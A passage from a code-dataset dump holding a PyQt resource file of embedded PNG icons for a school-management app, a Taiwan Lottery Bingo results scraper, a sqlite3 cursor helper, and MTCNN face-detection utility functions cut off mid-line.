\x8e\\xb6\\x59\\x09\\xa2\\x5a\\x99\\x5d\\xf4\\x6b\\x24\\xfa\\x24\\xbd\\\n\\x2e\\x69\\xeb\\x0c\\xae\\xfd\\xa7\\x6e\\x7c\\x8d\\xc4\\x98\\xdc\\x4b\\xab\\x24\\\n\\x57\\x69\\x1f\\x90\\x74\\x87\\xdc\\x6b\\x24\\xd6\\x4a\\x7a\\x54\\x52\\xde\\xf3\\\n\\x81\\x48\\x1a\\x92\\x2b\\x5d\\x3d\\xe5\\xf9\\xde\\xe7\\x92\\x36\\x26\\x49\\x72\\\n\\x25\\xe7\\x75\\xc3\\x03\\x6c\\xc0\\x1d\\x96\\x0c\\xcd\\x18\\xb0\\x21\\xd5\\x34\\\n\\x07\\xf8\\x2c\\xe3\\xfb\\xcd\\x5a\\x46\\x24\\x09\\xb8\\x0d\\x77\\x03\\xfc\\xaf\\\n\\x5c\\x2f\\x4d\\x86\\x99\\x72\\x26\\x05\\xf7\\x92\\x00\\x2b\\x03\\xd9\\xa2\\x59\\\n\\x37\\xc8\\x16\\xb8\\x8c\\xdf\\x81\\x92\\x4d\\x6d\\x67\\x3f\\x9e\\xdc\\x05\\xbd\\\n\\x3a\\xb3\\x5b\\x00\\x0f\\x02\\x7b\\xb0\\x8b\\x07\\xdd\\x30\\x01\\xec\\x26\\x67\\\n\\xaa\\xb3\\xe7\\xcd\\x96\\x24\\x60\\x11\\xee\\x8d\\x31\\x07\\x99\\x59\\xcc\\x3b\\\n\\x95\\xab\\xb8\\xd9\\xbb\\x99\\x0e\\x2a\\x23\\x55\\x9b\\x1d\\xfa\\x95\\x99\\x73\\\n\\x25\\x3d\\x24\\x77\\x74\\x63\\x99\\x5c\\x54\\xb1\\x44\\x6e\\xbb\\x56\\xbf\\x9c\\\n\\xbe\\x8b\\x72\\x5b\\xd2\\x4e\\xcb\\x45\\x24\\x23\\x92\\xbe\\x93\\xf4\\x7d\\xb7\\\n\\x85\\xd4\\xd4\\xc4\\x8f\\xd5\\x6b\\xd1\\x48\\x1d\\xa1\\x97\\x6f\\x90\\x75\\x23\\\n\\x9a\\x5d\\x21\\xa9\\xd9\\x9f\\x46\\xb3\\x2b\\x20\\x9a\\x5d\\x21\\xd1\\xec\\x0a\\\n\\x89\\x66\\x57\\x08\\x2e\\xce\\xde\\x9b\\x61\\x76\\xb3\\x1f\\x6a\\xea\\x42\\x4e\\\n\\xb3\\x87\\x42\\xeb\\xec\\x09\\x72\\x98\\x7d\\x81\\x06\\xee\\x11\\xaf\\x25\\x19\\\n\\x66\\x5f\\xa6\\x46\\xfb\\x58\\x1a\\x8f\\xc7\\xec\\x9d\\xa1\\xb5\\xf5\\x1c\\xa9\\\n\\xd9\\x43\\xe9\\x72\\x71\\x19\\xd8\\x49\\xd3\\xde\\xdc\\xdb\\x24\\x70\\x35\\xcb\\\n\\xb8\\x2e\\x47\\x22\\x91\\x48\\x24\\x12\\x89\\x44\\x22\\x25\\xf3\\x3f\\x60\\xd0\\\n\\xc2\\xf7\\x77\\x65\\x24\\x4f\\x00\\x00\\x00\\x00\\x49\\x45\\x4e\\x44\\xae\\x42\\\n\\x60\\x82\\\n\\x00\\x00\\x02\\x8b\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\x64\\x00\\x00\\x00\\x64\\x08\\x06\\x00\\x00\\x00\\x70\\xe2\\x95\\x54\\\n\\x00\\x00\\x00\\x06\\x62\\x4b\\x47\\x44\\x00\\xff\\x00\\xff\\x00\\xff\\xa0\\xbd\\\n\\xa7\\x93\\x00\\x00\\x02\\x40\\x49\\x44\\x41\\x54\\x78\\x9c\\xed\\xdd\\xbd\\x6e\\\n\\x13\\x41\\x00\\x45\\xe1\\x3b\\x28\\x22\\x15\\x42\\x4a\\x4b\\x68\\x69\\x23\\x3a\\\n\\xde\\x80\\x86\\xd7\\x88\\x68\\xa0\\xe7\\x29\\xc8\\x83\\x20\\xca\\xd0\\x90\\x3e\\\n\\xa4\\x02\\x5a\\xd2\\x86\\x36\\x12\\x76\\x2a\\x9a\\x4b\\x61\\x47\\x98\\xc9\\x44\\\n\\xcb\\xcf\\x7a\\x7c\\x17\\x9f\\xaf\\x9c\\x6c\\xe2\\x89\\x8f\\x66\\xd7\\xbb\\x96\\\n\\x76\\x25\\x00\\x00\\x00\\x00\\x00\\x90\\xa3\\xb4\\x06\\x6d\\xef\\x4b\\x3a\\x92\\\n\\xf4\\x54\\xd2\\xbd\\xae\\x33\\xfa\\xff\\xcd\\x25\\x9d\\x48\\x7a\\x55\\x4a\\xf9\\\n\\x52\\xff\\xf0\\x46\\x90\\x65\\x8c\\xcf\\x92\\xf6\\xd6\\x3f\\xb7\\xad\\x76\\x29\\\n\\xe9\\xa0\\x94\\x72\\xb1\\x3a\\x78\\xa7\\xb1\\xe1\\x91\\x88\\xd1\\xc3\\x9e\\xa4\\\n\\xd7\\xf5\\x60\\x6b\\x85\\xcc\\xc4\\x6e\\xaa\\x97\\x59\\x29\\xe5\\xfe\\xea\\x40\\\n\\x2b\\x88\\x7f\\xd9\\xa0\\x94\\xe6\\x71\\x06\\x7f\\x67\\xe8\\xfd\\x6d\\xed\\xb2\\\n\\xb0\\x41\\x04\\x09\\x43\\x90\\x30\\x04\\x09\\x43\\x90\\x30\\x04\\x09\\x43\\x90\\\n\\x30\\x04\\x09\\x43\\x90\\x30\\x04\\x09\\x43\\x90\\x30\\x04\\x09\\x43\\x90\\x30\\\n\\x04\\x09\\x43\\x90\\x30\\x04\\x09\\x43\\x90\\x30\\x04\\x09\\x43\\x90\\x30\\x04\\\n\\x09\\x43\\x90\\x30\\x04\\x09\\x43\\x90\\x30\\x04\\x09\\x43\\x90\\x30\\x04\\x09\\\n\\x43\\x90\\x30\\x04\\x09\\x43\\x90\\x30\\x04\\x09\\x43\\x90\\x30\\x04\\x09\\x43\\\n\\x90\\x30\\x04\\x09\\x43\\x90\\x30\\x04\\x09\\x43\\x90\\x30\\x04\\x09\\x43\\x90\\\n\\x30\\x04\\x09\\x43\\x90\\x30\\x04\\x09\\x43\\x90\\x30\\x04\\x09\\x43\\x90\\x30\\\n\\x3b\\x43\\x1b\\xd4\\x77\\xaf\\xc1\\x7a\\xb1\\x42\\xc2\\x10\\x24\\x0c\\x41\\xc2\\\n\\x0c\\x1e\\x43\\xb8\\xa3\\xdc\\xb8\\x86\\x8e\\xc9\\xac\\x90\\x30\\x83\\x2b\\x04\\\n\\xbf\\x67\\xac\\x7b\\x55\\xb2\\x42\\xc2\\x10\\x24\\x0c\\x41\\xc2\\x70\\x0c\\x19\\\n\\xc9\\x58\\x9f\\x46\\x59\\x21\\x61\\x5a\\x2b\\x64\\xae\\x95\\x5b\\x8d\\x73\\x2d\\\n\\x6b\\xad\\xbe\\xd5\\x03\\xad\\x15\\xf2\\xbe\\xc3\\x44\\xb0\\x70\\x52\\x0f\\xb4\\\n\\xee\\xfd\\xfe\\x48\\xd2\\xa9\\x78\\x42\\xc2\\xba\\x5d\\x4a\\x7a\\x52\\x4a\\x39\\\n\\x5f\\x1d\\xbc\\xb1\\x42\\x96\\x0f\\x19\\x39\\x90\\xf4\\x46\\xd2\\xac\\xcf\\xdc\\\n\\xb6\\xca\\x4c\\xd2\\x5b\\x35\\x62\\x48\\xb7\\x3c\\x61\\x27\\xc1\\xd8\\x4f\\x69\\\n\\x98\\xca\\x53\\x1f\\xf8\\x94\\x15\\x86\\x20\\x61\\x08\\x12\\x86\\x20\\x61\\x08\\\n\\x12\\xa6\\x7b\\x10\\xdb\\xbb\\xb6\\x5f\\xda\\xfe\\x60\\xfb\\xca\\xb7\\x68\\xfc\\\n\\xde\\x3f\\xf9\\x83\\xbf\\x77\\xb5\\x9c\\xdb\\x0b\\xdb\\x77\\xfb\\xbc\\x2b\\x3f\\\n\\x75\\xfd\\xe8\\x67\\xfb\\x81\\xa4\\x63\\x2d\\xce\\x73\\xa6\\xe0\\x93\\xa4\\x67\\\n\\xa5\\x94\\xaf\\xbd\\x5e\\xb0\\x5b\\x10\\xdb\\xbb\\x92\\xce\\x34\\x9d\\x18\\xd7\\\n\\x3e\\x6a\\x71\\x12\\xf7\\xbd\\xc7\\x8b\\xf5\\xdc\\x65\\x3d\\xd7\\xf4\\x62\\x48\\\n\\xd2\\x63\\x49\\x87\\x9b\\x9e\\xc4\\xe8\\x6c\\x9f\\x55\\xfb\\xea\\x63\\x2f\\x1e\\\n\\xf3\\x1a\\xc5\\xf6\\xbe\\xed\\x77\\xd5\\x5c\\x4f\\x37\\x3d\\xaf\\xd1\\xd9\\x9e\\\n\\x57\\xff\\x64\\x5c\\x8c\\x6b\\xb6\\x1f\\x56\\x73\\xed\\x76\\x4d\\xaf\\xe7\\x31\\\n\\x64\\xd2\\xdf\\xab\\xf4\\xba\\xf6\\xc5\\x79\\x48\\x18\\x82\\x84\\x21\\x08\\x00\\\n\\x00\\x00\\x00\\x6c\\xb9\\x1f\\x3f\\xbf\\x32\\xb9\\x74\\xbf\\x58\\x2c\\x00\\x00\\\n\\x00\\x00\\x49\\x45\\x4e\\x44\\xae\\x42\\x60\\x82\\\n\"\n\nqt_resource_name = b\"\\\n\\x00\\x04\\\n\\x00\\x06\\xf6\\x35\\\n\\x00\\x68\\\n\\x00\\x6f\\x00\\x6d\\x00\\x65\\\n\\x00\\x04\\\n\\x00\\x07\\x3c\\x61\\\n\\x00\\x6c\\\n\\x00\\x75\\x00\\x70\\x00\\x61\\\n\\x00\\x06\\\n\\x06\\x83\\xc5\\x63\\\n\\x00\\x61\\\n\\x00\\x6c\\x00\\x75\\x00\\x6e\\x00\\x6f\\x00\\x73\\\n\\x00\\x03\\\n\\x00\\x00\\x69\\x74\\\n\\x00\\x63\\\n\\x00\\x61\\x00\\x64\\\n\\x00\\x05\\\n\\x00\\x73\\x5e\\x23\\\n\\x00\\x6c\\\n\\x00\\x6f\\x00\\x67\\x00\\x6f\\x00\\x33\\\n\\x00\\x05\\\n\\x00\\x73\\x5e\\x22\\\n\\x00\\x6c\\\n\\x00\\x6f\\x00\\x67\\x00\\x6f\\x00\\x32\\\n\\x00\\x04\\\n\\x00\\x07\\x35\\xdf\\\n\\x00\\x6c\\\n\\x00\\x6f\\x00\\x67\\x00\\x6f\\\n\\x00\\x04\\\n\\x00\\x07\\x79\\x56\\\n\\x00\\x70\\\n\\x00\\x72\\x00\\x6f\\x00\\x66\\\n\\x00\\x04\\\n\\x00\\x07\\x98\\x02\\\n\\x00\\x73\\\n\\x00\\x61\\x00\\x69\\x00\\x72\\\n\\x00\\x12\\\n\\x0d\\xf8\\xc2\\x67\\\n\\x00\\x69\\\n\\x00\\x63\\x00\\x6f\\x00\\x6e\\x00\\x73\\x00\\x38\\x00\\x2d\\x00\\x73\\x00\\x61\\x00\\x69\\x00\\x72\\x00\\x2d\\x00\\x35\\x00\\x30\\x00\\x2e\\x00\\x70\\x00\\x6e\\\n\\x00\\x67\\\n\\x00\\x18\\\n\\x07\\x92\\xe1\\x47\\\n\\x00\\x69\\\n\\x00\\x63\\x00\\x6f\\x00\\x6e\\x00\\x73\\x00\\x38\\x00\\x2d\\x00\\x70\\x00\\x72\\x00\\x6f\\x00\\x66\\x00\\x65\\x00\\x73\\x00\\x73\\x00\\x6f\\x00\\x72\\x00\\x2d\\\n\\x00\\x31\\x00\\x30\\x00\\x30\\x00\\x2e\\x00\\x70\\x00\\x6e\\x00\\x67\\\n\\x00\\x1e\\\n\\x0f\\xd0\\xdf\\x67\\\n\\x00\\x50\\\n\\x00\\x59\\x00\\x45\\x00\\x44\\x00\\x55\\x00\\x5f\\x00\\x5f\\x00\\x33\\x00\\x5f\\x00\\x2d\\x00\\x72\\x00\\x65\\x00\\x6d\\x00\\x6f\\x00\\x76\\x00\\x65\\x00\\x62\\\n\\x00\\x67\\x00\\x2d\\x00\\x70\\x00\\x72\\x00\\x65\\x00\\x76\\x00\\x69\\x00\\x65\\x00\\x77\\x00\\x2e\\x00\\x70\\x00\\x6e\\x00\\x67\\\n\\x00\\x0d\\\n\\x00\\xdb\\x78\\x47\\\n\\x00\\x50\\\n\\x00\\x59\\x00\\x45\\x00\\x44\\x00\\x55\\x00\\x20\\x00\\x28\\x00\\x34\\x00\\x29\\x00\\x2e\\x00\\x70\\x00\\x6e\\x00\\x67\\\n\\x00\\x18\\\n\\x0d\\xa5\\x67\\x87\\\n\\x00\\x47\\\n\\x00\\x45\\x00\\x53\\x00\\x54\\x00\\x4f\\x00\\x52\\x00\\x20\\x00\\x45\\x00\\x53\\x00\\x43\\x00\\x4f\\x00\\x4c\\x00\\x41\\x00\\x52\\x00\\x20\\x00\\x50\\x00\\x59\\\n\\x00\\x45\\x00\\x44\\x00\\x55\\x00\\x2e\\x00\\x70\\x00\\x6e\\x00\\x67\\\n\\x00\\x19\\\n\\x0f\\x61\\xb8\\xc7\\\n\\x00\\x69\\\n\\x00\\x63\\x00\\x6f\\x00\\x6e\\x00\\x73\\x00\\x38\\x00\\x2d\\x00\\x64\\x00\\x6f\\x00\\x63\\x00\\x75\\x00\\x6d\\x00\\x65\\x00\\x6e\\x00\\x74\\x00\\x6f\\x00\\x73\\\n\\x00\\x2d\\x00\\x31\\x00\\x30\\x00\\x30\\x00\\x2e\\x00\\x70\\x00\\x6e\\x00\\x67\\\n\\x00\\x19\\\n\\x06\\x9e\\x8d\\x47\\\n\\x00\\x69\\\n\\x00\\x63\\x00\\x6f\\x00\\x6e\\x00\\x73\\x00\\x38\\x00\\x2d\\x00\\x65\\x00\\x73\\x00\\x74\\x00\\x75\\x00\\x64\\x00\\x61\\x00\\x6e\\x00\\x74\\x00\\x65\\x00\\x73\\\n\\x00\\x2d\\x00\\x31\\x00\\x30\\x00\\x30\\x00\\x2e\\x00\\x70\\x00\\x6e\\x00\\x67\\\n\\x00\\x0c\\\n\\x0e\\x4d\\x06\\xc7\\\n\\x00\\x70\\\n\\x00\\x65\\x00\\x73\\x00\\x71\\x00\\x75\\x00\\x69\\x00\\x73\\x00\\x61\\x00\\x2e\\x00\\x70\\x00\\x6e\\x00\\x67\\\n\\x00\\x16\\\n\\x0b\\xbe\\x7f\\xe7\\\n\\x00\\x69\\\n\\x00\\x63\\x00\\x6f\\x00\\x6e\\x00\\x73\\x00\\x38\\x00\\x2d\\x00\\x6d\\x00\\x6f\\x00\\x6e\\x00\\x69\\x00\\x74\\x00\\x6f\\x00\\x72\\x00\\x2d\\x00\\x31\\x00\\x30\\\n\\x00\\x30\\x00\\x2e\\x00\\x70\\x00\\x6e\\x00\\x67\\\n\"\n\nqt_resource_struct_v1 = b\"\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x01\\\n\\x00\\x00\\x00\\x2e\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x12\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x11\\\n\\x00\\x00\\x00\\x5a\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\\n\\x00\\x00\\x00\\x0e\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0f\\\n\\x00\\x00\\x00\\x68\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\\n\\x00\\x00\\x00\\x76\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0d\\\n\\x00\\x00\\x00\\x4a\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\\n\\x00\\x00\\x00\\x3a\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0b\\\n\\x00\\x00\\x00\\x1c\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0a\\\n\\x00\\x00\\x01\\xb4\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x78\\x69\\\n\\x00\\x00\\x01\\x46\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xa2\\xbb\\\n\\x00\\x00\\x01\\x26\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x78\\x1e\\\n\\x00\\x00\\x00\\x84\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\xae\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x01\\xd9\\\n\\x00\\x00\\x01\\xec\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x8a\\xa3\\\n\\x00\\x00\\x00\\xe4\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x09\\x2e\\\n\\x00\\x00\\x02\\x0a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x90\\xba\\\n\\x00\\x00\\x01\\x7c\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x75\\x68\\\n\"\n\nqt_resource_struct_v2 = b\"\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x01\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x2e\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x12\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x11\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x5a\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x0e\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0f\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x68\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x76\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0d\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x4a\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x3a\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0b\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x1c\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0a\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x01\\xb4\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x78\\x69\\\n\\x00\\x00\\x01\\x82\\x18\\xb4\\xb0\\xa5\\\n\\x00\\x00\\x01\\x46\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xa2\\xbb\\\n\\x00\\x00\\x01\\x82\\xf5\\xc6\\x71\\x60\\\n\\x00\\x00\\x01\\x26\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x78\\x1e\\\n\\x00\\x00\\x01\\x82\\x22\\x2d\\x29\\x37\\\n\\x00\\x00\\x00\\x84\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x01\\x82\\x18\\xb6\\xee\\xd7\\\n\\x00\\x00\\x00\\xae\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x01\\xd9\\\n\\x00\\x00\\x01\\x82\\x18\\xac\\xfc\\x38\\\n\\x00\\x00\\x01\\xec\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x8a\\xa3\\\n\\x00\\x00\\x01\\x81\\xfe\\xb6\\x86\\xac\\\n\\x00\\x00\\x00\\xe4\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x09\\x2e\\\n\\x00\\x00\\x01\\x82\\x22\\x16\\x2e\\x66\\\n\\x00\\x00\\x02\\x0a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x90\\xba\\\n\\x00\\x00\\x01\\x81\\xf3\\xf1\\xf0\\xa1\\\n\\x00\\x00\\x01\\x7c\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x75\\x68\\\n\\x00\\x00\\x01\\x81\\xf3\\xf0\\xe0\\x4c\\\n\"\n\nqt_version = [int(v) for v in QtCore.qVersion().split('.')]\nif qt_version < [5, 8, 0]:\n rcc_version = 1\n qt_resource_struct = qt_resource_struct_v1\nelse:\n rcc_version = 2\n qt_resource_struct = qt_resource_struct_v2\n\ndef qInitResources():\n QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)\n\nqInitResources()\n","repo_name":"MarcosViniciusA369/Software-Gestor-Escolar","sub_path":"link_rc.py","file_name":"link_rc.py","file_ext":"py","file_size_in_byte":432013,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27034118587","text":"from emoji import emojize\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport time\nfrom time import sleep\nimport os\nfrom requests.exceptions import ReadTimeout\nfrom requests.exceptions import ConnectionError\nimport json\n\n\ndef requests_get(*args1, **args2):\n i = 3\n while i >= 0:\n try:\n return requests.get(*args1, **args2)\n except (ConnectionError, ReadTimeout) as error:\n print(error)\n print('retry one more time after 60s', i, 'times left')\n sleep(60)\n i -= 1\n return pd.DataFrame()\n\n\ndef requests_post(*args1, **args2):\n i = 3\n while i >= 0:\n try:\n return requests.post(*args1, **args2)\n except (ConnectionError, ReadTimeout) as error:\n print(error)\n print('retry one more time after 60s', i, 'times left')\n sleep(60)\n i -= 1\n return pd.DataFrame()\n\n\ndef latest_number(*argu1, **argu2):\n url = \"https://www.taiwanlottery.com.tw/lotto/BINGOBINGO/drawing.aspx\"\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n\n try:\n res = requests_get(url, headers=headers)\n soup = BeautifulSoup(res.text, 'html.parser')\n except:\n print('**WARRN: requests cannot get html')\n ID = soup.find('span', attrs={'id': 'lblBBDrawTerm'})\n table_rows = soup.select('td', attrs={'class': 'tdA_3'})\n ID = int(ID.text)\n\n result = []\n i = 0\n for div in table_rows:\n td = div.find_all('div')\n row = [div.text.strip() for div in td if div.text.strip()]\n if row and i >= 1:\n result.append(row)\n i += 1\n df = pd.DataFrame(result, index=None)\n # df = df.drop(df.columns[0], axis=1)\n df = df.drop([1, 2, 3])\n df = df.drop([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12,\n 13, 14, 15, 16, 17, 18, 19, 20], axis=1)\n\n df.insert(0, '期別', value=ID)\n df1 = df['期別']\n df1 = df1.to_json(orient='values').strip('[]')\n df = df.drop(columns=['期別'])\n\n df = df.to_json(orient='values').strip('[]').strip(',\"')\n point_right = emojize(\":point_right:\", use_aliases=True) \n content1 = point_right+\" 期別: \" + df1\n content2 = point_right+\" 開獎號碼: \"+df\n content3 = \"\"\n content3 += '{}\\n\\n{}'.format(content1, content2)\n return content3\n\n\n","repo_name":"arthur8485/latestbot","sub_path":"latest_number.py","file_name":"latest_number.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6727677280","text":"import sqlite3\n\nfrom contextlib import contextmanager\n\n\nclass DB:\n def __init__(self, filename):\n self.filename = filename\n\n @contextmanager\n def cursor(self):\n conn = sqlite3.connect(self.filename)\n cur = conn.cursor()\n try:\n yield cur\n conn.commit()\n finally:\n cur.close()\n conn.close()\n","repo_name":"MrKich/simple_weather_bot","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11047378816","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 21 10:31:51 2018\r\n\r\n@author: yy\r\n\"\"\"\r\nimport h5py\r\nimport cv2\r\nimport numpy as np\r\nimport glob\r\n\r\ndef resize(im, target_size):\r\n h, w, ch = im.shape\r\n if h != target_size or w != target_size:\r\n im = cv2.resize(im, (target_size, target_size))\r\n return im\r\n\r\n\r\ndef flip(face, landmark):\r\n face_flipped_by_x = cv2.flip(face, 1)\r\n landmark_ = np.asarray([(1 - x, y) for (x, y) in landmark])\r\n landmark_[[0, 1]] = landmark_[[1, 0]]\r\n landmark_[[3, 4]] = landmark_[[4, 3]]\r\n return face_flipped_by_x, landmark_\r\n\r\n\r\ndef rotate(img, bbox, landmark, alpha):\r\n\r\n x1, y1, x2, y2 = bbox\r\n center = ((x1 + x2) / 2, (y1 + y2) / 2)\r\n\r\n rot_mat = cv2.getRotationMatrix2D(center, alpha, 1)\r\n\r\n img_rotated_by_alpha = cv2.warpAffine(img, rot_mat, (img.shape[1], img.shape[0]))\r\n\r\n landmark_ = np.asarray([(rot_mat[0][0] * x + rot_mat[0][1] * y + rot_mat[0][2],\r\n rot_mat[1][0] * x + rot_mat[1][1] * y + rot_mat[1][2]) for (x, y) in landmark])\r\n face = img_rotated_by_alpha[y1:y2 + 1, x1:x2 + 1]\r\n return face, landmark_\r\n\r\n\r\ndef bbox_2_square(bbox):\r\n\r\n print('bbox_2_square---:',bbox.shape)\r\n square_bbox = bbox.copy()\r\n\r\n h = bbox[:, 3] - bbox[:, 1] + 1\r\n w = bbox[:, 2] - bbox[:, 0] + 1\r\n max_side = np.maximum(h, w)\r\n square_bbox[:, 0] = bbox[:, 0] + w * 0.5 - max_side * 0.5\r\n square_bbox[:, 1] = bbox[:, 1] + h * 0.5 - max_side * 0.5\r\n square_bbox[:, 2] = square_bbox[:, 0] + max_side - 1\r\n square_bbox[:, 3] = square_bbox[:, 1] + max_side - 1\r\n return square_bbox\r\n\r\n\r\n\r\ndef convert_bbox(box, kind=True):\r\n \"\"\"\r\n (x1, y1, x2, y2) --> (x1, y1, w, h) (kind=True)\r\n or\r\n (x1, y1, w, h) --> (x1, y1, x2, y2) (kind=False)\r\n \"\"\"\r\n a, b, c, d = box\r\n if kind:\r\n return (a, b, c - a + 1, d - b + 1)\r\n else:\r\n return (a, b, a + c - 1, b + d - 1)\r\n\r\n#h5文件不能存放字典、NONE,可以用pkl\r\ndef save_dict_to_hdf5(dic, filename):\r\n with h5py.File(filename, 'w') as h5file:\r\n recursively_save_dict_contents_to_group(h5file, '/', dic)\r\n\r\n\r\ndef recursively_save_dict_contents_to_group(h5file, path, dic):\r\n for key, item in dic.items():\r\n if isinstance(item, (np.ndarray, np.int64, np.float64, str, bytes, list, tuple)):\r\n h5file[path + key] = item\r\n elif isinstance(item, dict):\r\n recursively_save_dict_contents_to_group(h5file, path + key + '/', item)\r\n else:\r\n raise ValueError('Cannot save %s type' % type(item))\r\n\r\n\r\ndef load_dict_from_hdf5(filename):\r\n with h5py.File(filename, 'r') as h5file:\r\n return recursively_load_dict_contents_from_group(h5file, '/')\r\n\r\n\r\ndef recursively_load_dict_contents_from_group(h5file, path):\r\n ans = {}\r\n for key, item in h5file[path].items():\r\n if isinstance(item, h5py.Dataset):\r\n ans[key] = item.value\r\n elif isinstance(item, h5py.Group):\r\n ans[key] = recursively_load_dict_contents_from_group(h5file, path + key + '/')\r\n return ans\r\n\r\n\r\ndef load_weights(weights_dir):\r\n weights_files = glob.glob('{}/*.h5'.format(weights_dir))\r\n p_net_weight = None\r\n r_net_weight = None\r\n o_net_weight = None\r\n for wf in weights_files:\r\n if 'p_net' in wf:\r\n p_net_weight = wf\r\n elif 'r_net' in wf:\r\n r_net_weight = wf\r\n elif 'o_net' in wf:\r\n o_net_weight = wf\r\n else:\r\n raise ValueError('No valid weights files !')\r\n\r\n if p_net_weight is None and r_net_weight is None and o_net_weight is None:\r\n raise ValueError('No valid weights files !')\r\n\r\n return p_net_weight, r_net_weight, o_net_weight\r\n\r\n\r\ndef process_image(img, scale):\r\n height, width, channels = img.shape\r\n new_height = int(height * scale) # resized new height\r\n new_width = int(width * scale) # resized new width\r\n new_dim = (new_width, new_height)\r\n img_resized = cv2.resize(img, new_dim, interpolation=cv2.INTER_LINEAR) # resized image\r\n img_resized = (img_resized - 127.5) / 128\r\n return img_resized\r\n\r\n\r\ndef batch_gen_bbox(cls_map, reg, scale, threshold, stride=2, cell_size=12):\r\n bboxes = []\r\n for cls, bbox in zip(cls_map, reg):\r\n b = generate_bbox(cls, bbox, scale, threshold, stride, cell_size)\r\n bboxes.append(b)\r\n return bboxes\r\n\r\n\r\ndef generate_bbox(cls_map, reg, scale, threshold, stride=2, cell_size=12):\r\n\r\n t_index = np.where(cls_map > threshold)\r\n\r\n # find nothing\r\n if t_index[0].size == 0:\r\n return np.array([])\r\n\r\n # offset\r\n dx1, dy1, dx2, dy2 = [reg[t_index[0], t_index[1], i] for i in range(4)]\r\n\r\n reg = np.array([dx1, dy1, dx2, dy2])\r\n score = cls_map[t_index[0], t_index[1]]\r\n bbox = np.vstack([np.round((stride * t_index[1]) / scale),\r\n np.round((stride * 